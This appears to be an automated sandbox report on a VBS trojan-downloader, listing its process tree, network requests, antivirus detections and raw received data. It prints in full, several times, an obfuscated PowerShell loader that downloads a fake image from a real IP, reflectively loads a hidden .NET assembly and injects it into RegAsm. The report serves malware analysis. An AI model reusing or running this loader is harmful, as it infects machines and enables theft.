Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 4, 2024, 4:56 p.m. | July 4, 2024, 4:58 p.m. |
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\profilegoodforinvestreturntogold.gif.vbs
PID 3044
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 
-and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
PID 2292
-
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://91.92.254.14/Users_API/syscore/file_fdncluho.ggk.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://91.92.254.194/imge/new-image_v.jpg |
request | GET http://91.92.254.14/Users_API/syscore/file_fdncluho.ggk.txt |
request | GET http://91.92.254.194/imge/new-image_v.jpg |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 
0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" |
cmdline | powershell -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 
0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" |
Avast | Script:SNH-gen [Trj] |
Kaspersky | HEUR:Trojan-Downloader.VBS.SLoad.gen |
NANO-Antivirus | Trojan.Script.Vbs-heuristic.druvzi |
Detected | |
ZoneAlarm | HEUR:Trojan-Downloader.VBS.SLoad.gen |
Varist | VBS/Agent.BNM!Eldorado |
AVG | Script:SNH-gen [Trj] |
Data received | D^àÍ× *»¥Ùµ'Ò8ÇÆ·û^UÕ]H,^`&û!äSgõ«kÝ&iN T ªíSÅÀâÚåÙ3¸ßBÜÎ}<Èhîã\ Wðí³BHOÞ½*ux/2u?f]!=+ÊÎBî^6:ßRHÍ°;+ç?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ nÄð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y{,Çi%{{V{³<ÌcÒêc@Qgó¯åêàÕT+庺°aaèAøæ«jÕ5:e[Ä2·á<uç¾Ù¨²Ã§H¤UÚYNÂ6óÁ¿1¤UµnZÈàû|O~GljmãmÔ`åÕQ|mès<ê1QÅ pOªQ¤TU¢NãÀ®üfmKøf§a&µ#ñpsó¾®5û¬òï£Ùõïû] & £wde&þþ¿®|W,oáò!p®¬ {àbl n1Ý3»D9³|y¸à1e¦-^râ2ÊmE¬¨5;è©Ô$ADYN<µXöZ<WL¾âþc8àô:Ö\¾ÄÎùàB&àVl#ª-T Ä)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U}$cºö¿¶:tÓ<Q<`3I·Óé/¡Úw6949ù]ðé&5fShÌ~EIü? ]jiãÓÞÕ·3qék;x±føºäñÒ:1UônfÚY÷"¨P:òóÓÎ"ûÉØhÛWp<¹[qm¯´µí?Í?®ÖÅ<k{v¨V{¬ <Wÿ |è?\]&0ȱ±Xî2;(b^)¯Ó$ªãÂ]TZæ1ªcÇ#¦Oâ $²¤VøÚM!;Oá¬2ͧ×/RÚ8£l}ðÖËÂH>-²Ç©î2uz)4úÔ´wÃW\*`tïd c ËyrÚ ÑàU':¢Á$_éðý襤nü9 ¤5X+ÀKY¢ÒóY\4 Æf¤ú^&þl0ÍçØÑ*8<ýÐK½HSÐQÁ7YüÍ3ü&ÁS\p)3Êà vçÚ'r¡Ê:äù/±ÑÕ×>ø2ùÊÈHP£¯scb¹±.F¯¨Á$e% °*z® *IM±J .¯ÕD Ù 7Ᾰ}##H m¶l6¥Òfm"ºà¼7LñyF»¯ü0jxÖ· Ù+¸úcb$gT2ícÒ*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±B)(£pjq5± µW =²Vz-~¢EÀÐETDíÛ¾fO¨BÎ5nººçVÞö ñW|RmÌ\LÔIíTUT±VïlD#vÖ¯â aâT@©v@«÷Îbâè©^}¨E.Þ/¹ÍbñíUµ4lSHªC(#hç'FÑI Æûo|$vdì¤^bÓÀåå$éÅbmb» Ìxq6äa¾¯B&vQD ¸Å 2~#5¤³'âKãÔí$ÜO@p3ë:±¨ôþl[¢;à¤Q»é<Ë*H"ÊÖVue¨ß?<¼jOE'é>¢Ir.át(H'l¥`YÈ,JÆV³«'È»Ü-Õá*¤À Ùúaô˽É, íY£0Ë°úã:Wvu ÿ ¶mC»m`¬Êh s««ìk ÛRÉÚC®»ãè06f@ÆÑ?\ÏE*áð¨ o?ÒS®Ô/ åËDÖ 04Õáã$ bÁXÐ=f4Ë@]0ê$.P°0q6¢BÔ@ s°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏÅÜò1¨¹iTÐøpU-êøwÇbZ(á[dÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ÓÊv©<^ø5)*òAàbí©DpÀ |
Data received | Èâû·5þò« X·Au¶½ñß ÑÇÆU¶Ôÿ C× Ú<,0»`-È?3À÷÷÷Êê%e < Uo5·°ãj ^ Õ¤×ID ÚÛj:ÖºtËê¾ôÚ]-¸3»Óק¿J¬y5:h¢eÒÄk©Æ<Xfñ4ÒD»uÐá"ÒéUi¡15Å,Ãø«§~âò ÐéÖYõ,IW+jÕt¬Âôí¨P±Èò*ÕZ7}~X/ðÉ%A$p©Ðohâf ñ x|ÓIȪª»¯ï-*éõdiõª«y©»}Ð¥Ú}èû~XÔé>éá{ãÓUA\Ñ-CÏ¿ló¯sëa@²/Ä0cTxéËÄ`Ó<.ºåýÛÄ© Ü@9ç<eV/Q¦R`ä« ¾8àdká}>© sÿ vH^Ü^ FVXM»EuëÞÿ \íK¼²våKòk&XZ:;OnßÀ"ÌãH" °$צ9M¡, 1¼Fý-T Y¬F0ü)iKn"¨fJ&¡õ1n ÊÅcb»¹ä×Èàz >M?,ò£[Û©»ø{ã#ÃãÓitf&3;Xî°ãЮC<Sà &²!mË©f dU@]/®_ÑjeQ&¥ZYuf ;Òúm-·Å`5öI§}+iÜHÊò#$tK 0"èôúâ³êôúÝ:¼ÚIc(*ª6àZÝr/iàÔ¦´èVò<*±FZBKnà®*Ów{À4jN¶,j¶ª2¹B¶ÇáÀcC«Ñ¾ªãPJÆû¡Wq¦çh^Oþùe}%:i@¢9UE o#o^Þ áï<˪vu$WP6nÑø»u¯O¡}tÒê¢Hå¦)bà§¢Þ 43ù(SZ@Ìh Oû¹¦ú USqD §eÙEí³êÛùàeðÔÌJ;Ḧ+ÇÔ^fê×S§ÔG²ÓË, «p¨¨¯ üR}>·Å4ÚURtðƦBª¡Ú; íKáqieFD5,£ÔAP÷±ú·M³G©wmpUªo¸?Ï ¨ÓM¥ÑùXI3Røj©<}ð4ðs¥Ë´,0tkV15XÙÐnüà¢ÖxxY®ÀÑ+©¥=?wÇOaý3"9uÍQI¼H,H¬UFeA<"ðèò4qéàEi5» £Ö¦É^Ä{÷ÀkA'Úû©@IܸµÛðö9²!áùJð4;£°Ë`ZÚ6]ð¸éè|%Ö9b-÷L¡k, ¬qxµ¦³Ä Óê"YeÚÖB¸òðKÒ2¼JÕ¨*¹;½?/â9Óë<ã~T ª æ _O~pk£M32$±ce1fÒT¼ûçPЬAb]TÎÁßu PÕuÖC$¦4.5J_XmÆÏOOüq)u:gbÁ ¸.ÁË$2êg%\òÊNÒÂú×(´O4jÊ˵|°^µ]NtÂ#Ü0 èNò{ôÅ LËu êÖd¡öÛñ)Aòøî Ü{àeE3 `ÁI;àkhüF 3¤Ê, Êè¤ZÇá pW¶?£I<-4}GKÅ+m<À},VõéiURoe«Íþ-¸Tp²(& 0òÀÓûþHägYAÍÌ7§5}¦C«dVc¤*îÉ yàѯb gË3HÉVSaE1`~Df¯Hèuk3Ä%We%KmUR¼Useÿ {À§[¥VÂX¶æYFÖõ] ^¼ßlZ]f-n< Sæ:ú¹zúO³vÄàój# w8FµU=ÿ ߬VMvª'BIve r j÷ÿ GØõ§]ù2necÅ)£Å|ºàæñáU5ÜE(ë\éÏØHª¹µ$u÷øñ:¢èQâìP7ÇÇo¾GCµ+V·DYv<ækmãpÒÎ&TfÕvüÓ ~À÷eà`£ ÜT×¾X(`5Þ²¥úIà~HB½«¾ÑÐ`-8t.\_n×ïH¶¡ =ÎPJ"£Ï$]û~X"_GñÀcp+Á`kq¦A !$®â@°¹hR7Ó1ZÝé¢i@ú0O壷)æò 5f$éG§Ór)4<{ä±Ó´0ÍØ¿H×N]l~®¿LøôÕac_U¡9ªºX²`Ù!@SiG¯§BÞZBÊC.ÖP¢~p/˳1mÄ3E"À¡ÛÛdB¡J'K°/ ÎÝÝP,l ®w*>¢j¨ÏË"9"v ôl,pèXªP6Á.Ñw·ê+*Ú ¯rv1ê6pIܳ3Uµ~7fÜ -nïyXáwP ª²XØ øaOq9Gµ6ÜówíÎLæXc47*·8º Ð:^:4µ b)°o¤tùwŵZvGe½q«÷=°ð^<EÇ4Pôÿ xbSÎ&Y;ËQì ¼{À=Zùq×ÜvĦI¨mFrÊ( ñ¾ó´¯¾^ `¢³Ó-I@*¶KðëÒÌé)%°¤ø©}½þ£0e Ú(VP kåY· <ç ç¦PmÚoñvÀ¾ci}|Ãß&Y¨U hs}Éþ¹_\OÈ*ÃÜ_Ç* JÁUß L ¤Ná[j¨_.F#Õ]½±P®p'â/éWQNරAÜMY·O¦ÅÚÁ¾k#s0 O¦7åF$U*[tÅ,`?¾UR7Tp-¬Yä*ýpQg®]¤ d¯$ >2Ç·vÐŵÀ Ðý0D Q߸@©'h}s¼ÆB«Dbz÷âÿ I T° zõyqO ¢Áõ1äPøà. 
¼ ¬ -G¯«¾ÙGZ<Ï`2´Tû @ 7X±³ùa},+8«®9U ªI`Zàs\ ¹o&6óO§Û4cÔBºeYþ»ÿ U¥c"À,ÛoÏ.&Ü V®?õóÀ9f2n@" =M'^}¬LåîÇ%ØUíH5Ý!!j÷ÈhţߴYGâe!GÈwùà"ij¸0 è0ÒnàìÚG·?>ª2ï[RAª'ãåXI¶N÷ò¥Z«<wÀ/1X IQ¸ViŤ$ 6±Æ¬óéi+ Ì«êcÒè~Xù¼ùÉ<¢·_¦ ´Lº}MÈl ko9èt~"$MzyåóD`]Hsð¼ÈÒ@RC¨»ÚÕÇ=O=/6H;r*,³è[ÅñE{õÀ&I©¥Ûº6¶¼EÚ]ÊC1!WåêëuÛ NKiü©N£Ôª¨Á°<]uö±]:ÕÑhu¥?{´úV²tPTôRhtï×=I¦Ò¦Í<K¾ª9?3¥ðor©!AÊRª ໾¹Í¼:m4¡Qn&Zf*ÍÙzöëÿ [ÔV!Ôm°xµí<ÊQ¤±GO=°/§pðï ¿¼³¡ÒA~ ²§úwÁEÒ(2O1¡ëó?ÏhQFªa{oþ¼ iÙÜ äÑmÇç ²¨#§Po¹þ¼h¡þ¢ÊIç©ëïÅ ¢Ã×èÕm[y±ý«}«:ÿ *hñyõ¶?h#û;öv}I¯4®ÔRz3òö¯Tú½\Èij±bN Lk}NpGvË^pÀ$HuVýý>/âãŵ)ÿ fÒ°*~&íùuÏxê|gÅ ÐéI\(?\}ð-7ÙïÓè4諵ö·5rNÀ eÆTgû]ö¿AöKÂU©pe ¢ÔÍý¾8ö»í~춫RÀÊÀ¢ÔÍý¾9ùíOÚýÚ|ë^Õ*;ûSö£_öÅdÖëd,XÒ(>^ÀóàÃDØ(²N{O²?³Ýgj#r°_,Fh~ξÏxW³ë<OR¨ÚƯ>¡/Ûß³ÞÝô![h¯HÀõ_eþÇøÙÝ"¬Q¨zå«mn·T|+Å¿kºéË&6/cC_öÇƼ@3RàÀà~×ý·ð ;õ(Hìxÿ ý°è ܺe.F|6Yõ3±2HÌO¹ÀÈåÍ|ð>âµïÔu½³ÌxÛñD àÖ`*3~ |
Data received | K,ë V-º%³×à æÏ"¹Øäð¼Üû?©Lé+væ]ÄWÅOlKÂ]#*h+í_LÌñ½n°é eÚKÓ5n$À^ Y^Ò¬ÔbÙU0U°kõùá¦)$%YmÀ!J |j°1c}[F°j4m;´¾jj®+åùmSTÞS»V$$Å ´W$ ¾PÎÂÊñùV}gÜÜI0°ß¨¾¼ÿ L ¦ÑëU ßL±1h>6·¢@àíM¯Ä<?ïAZÕ¤!¬³ÜÐóÊør¾² n¢0tÓ4ìÖ+( ût¿Ï3ü;F4úÅieÔ(±jQÓ¯Cÿ LKÈ%gYIõP«<sA{TFâ.¨I[Ò¦E [Û b³Ï3<k© ± Ëdd{¯®ðH,äj¿Ó. <ÔWCX¢$ÚU*-°Úª¼üJ}ðZMNÍd¾cÌÉS¢µS^|¬¦¸$È(UU¿Î±P27ºïÓáq¬®:Õ¯pG¶7©;ºm *ëUÓFÌ´Á«%²º-sȲQ³²ØµØôéøÚ<;µr*©bfÀsé%Òë4"M9/VÜÅÝ|:`?¢êTèVAQÍã¡Ì=\ª²0-I ·Z¿úcIâZ ²",h©û¸RAÒÈ÷ħ.\3úæéÔ×úú`3¦(Pº mѵ µå°OWçÐiWQȲ,ØQ ÐüâP;iõ7-#:: -O&Èã¾Lú¨"ÄhK+U^£:FcG,* eõ)¯©ý±o;O<$h%gÔ³~¯çǪwY#Fv¸Q±H¨=É÷÷Êh=$gL®¬ j±èpS¨ Xò<¸ÕÐSèRh^yøõÓÏ$},j$f6Tª½ïÙ×ø~}hy÷qíw¥NÕèÀS_$X`£jÖÑÓÐøf6)*~7»M8ÿ ]0Ðè ÓølÐG2´ªÆÉâÁùfU6À7v ¢»sÔ$z=ï?vßhÚýdy÷ç'P¡KUÐÜ¿Â?Ю»AÑÉ)^7DæphµºEo1YlnVk² `M§¡Mç=l|3S¦Oҫ©s+FÊ-léÞñ¹QBbHaÈÛÉ7ߤðÆUBêErÅO+ðÉÕêJDÀƧQ»jª±mÜ)±ÇwôÀFxãÕN4ªÔíu_:ÅkD@ô©íîo§XÔlDÔÔ½NijtHP+´ENÚÀÄ×Çÿ h \~ìÆÒQ|ns(Äå*5nö9êµi¦X"S¦U¤3U ÉúfÝVw×p4Å{'ÛÆÈÃy®;c¥¶PñR£Z÷»Ç5q$GÏ6(¤WMÆÁÓ¿\\E4í;Æ´ )ìG_ï(YÎTU}tJÝò=¹Æ¼3M¤'Q&²}±Ä´»ÔI= 4N°Êó"þ"ܺí-$©ÉþcÔQì>itzK¼ÅÕ¡P J©ÕgM rÈÅXªÆî=`¤Òü»^)i¥iâIôûX±Ív5ZÑ£o8¸*KnaøO¨ØØ|A#O¹HYXЮµßòí©c hw1Ubù¡ÔUeµ/jXC(ÔF«Ç¬uë×®hn² úª¸¯LÉ£+4.$äuPA«úå§Ó4¢(å (Ü̾hûr0¦+tÔ<Jßââè×±?²NÖ±÷6íÎUoÒv×oLÐÉmqÏú9@Sß¹ÍÍN\CR¨"Ôn<1_\ÈÎÅu®NÚ<´·^=²FQ ¯°ú=Cé\Èù¯ Ëj&Yì l·C® r¸RªÌ¤µúäHËV þyv-(&Z¶ë)¥y[t¸àydFcÆBX.ÎÁêkþX"[sØ{d« y{äjÜHþ¹[n$_Ô,UW¾ë [Ë1¾Ø AÙ$ÚÑ=MàYäÝËQ²Û-þZí~°×òÅk/´¨ÝÛÕÛ>®¦ó 0pWA®}ϸ,9$2æ)T-£~ðz==GõcQcæø¶½½:_<×rqó¬kî¥v]¦*ܬnp«-Öð5|'¯?ófAãò¯àrK ^ã¾d' ùÁ±XÅ,¬«¡¤ôôÈÜO·å!vB ú\+#¯5Å]}p6I?ËòÊßfw 3B ®CmÚ*ï¿·ÓA±2ÄòOì0@@NM<F®À nøû`^&M£s¨£`AýNá¸92Cnàþ_´q§Ê¤3²-D µürçHÐ+ ( ×$¨$ò~8 óPÏñlµ BG>\jê3 ë`¦û«° »Oévàxz8±Ó }ÐQeEÝñ¸ÿ \cÜ7sÎê¯Òó ÓbÔ¢ìÕÐýð cMí"üVæ¼q÷A i`Üô£ùfò Z¥{U4Eî4y¾Ã0Vve®()¾·ý°%Ù$ÌëePÝÞ¯¶[OvIdcµ» R;Ü_G£,ì ÂÛºÖè· v÷ÀèÝ"ãó!RÂøã°Æ4Ï#«yÈÞîI×O|OÈ rÆÀÛt°:uï#xÔÛ$ õߢ³¾vó[¶æ>Úñgr¢¯'¥f,di5ED¬BµR }p²<µ»¯îȵVj%aÚÅxy _ïÓ*ëì7È¿ùW:wdHÍXì)TqÇCèôQ»Ì®¶ )¡ÐwÀA4¥£2þ'±|ö¬$H\öäþ¼c^%mHf$(U[úÊG¥_+~õº$@èkÞÿ L4¥Öj õp íࢩ$óæó#LÊ¡HÝb¯ÞÆoE¤¶òÌÍÝc}(I£ < OE ÏaöwMZny Ñv6O9çtHU¾ýsØxafÅ·¨Ç#]ÂÎ@,c¥r¢v®{a¢]ÃÔ9^+å,s¢ÐmaÓ/ð!éþx·ø¬>I7«¸À§øÆÀü.mL¬ªÔYWüM¾Ñx´þ1â³jfbK1 vè>ÚýºoÖ]ËGóÏÚ¨Ù*à 
NV¹ÆI׺¨àM§}N¡!K;0P~¦ý}ì¯Ù´Þ£ï3 ò±A®!+ý}GvûCâ`G¤ËV#©ç°ÿ ]3[íçíY¤ðßq° 2ÿ LCûAý©é¼K&Ãe×[ãóÏÏí~§ÄuO¨ÔÊÒÊìYreóµ³4å%Jø|Ñë¨soKÅ÷Q§ Ì?Ìÿ lÓ|¤T=T5ðÀq#Û¥r84ëéãò|7]"5¸ewp·_®)£#!è²ðx^6¦2ð2z4~ë6*úÝ6è5jc<0 aóÅüHÀÉçk&þâQ¶þwÏúãÆPbÐ'÷c øÍÍïû_$º¤h4ñEÝ¡H(´ Ì÷ñMoW¥*Ô |Åÿ <r1¯#I1w×#_ 8Úß16áæΡo _\þÍ# '´([øÝäx|/êVV£ÿ Êë|WM¡ÑýÏI{º9«êI÷Å~ÏjxÓâ0=XÓ¾ÐÏH¤[=Ç¿Ó,à3ÊÜQ´Ó©\Ë!4XþïjÃ4éí@|;àyóÿ Úº1Ä(6ãh÷¼P}ðZ FŤwñ)X0£·ÿ (Ä?øÏÞXñ£l~£}B!iTv¿ê~¹&FDg$R5Ä£cEXðß_Á´.þêOjÁIâÚæ1èÒNÕÜÄ{â \jºè rZ2Q@äð¸Ä¾ö¿s#lÞw?¸n6ÀØÅõ0ɳWáÞ×k~}>Ätáã`ó ûó±x&!§Ôò¯ÒÕf3ðø{¨øÌ^"þ©à 8*ëØýp#Q¥ J:¼89m>}Aô¡Uÿ ¿·G¨ e2ªn ín£Ôx C·JMÍuôp4>Êxñ}^¿áãð6{ôôÚÐ #ñ±Æ|ûìÔþ)Ú=4L¨W |
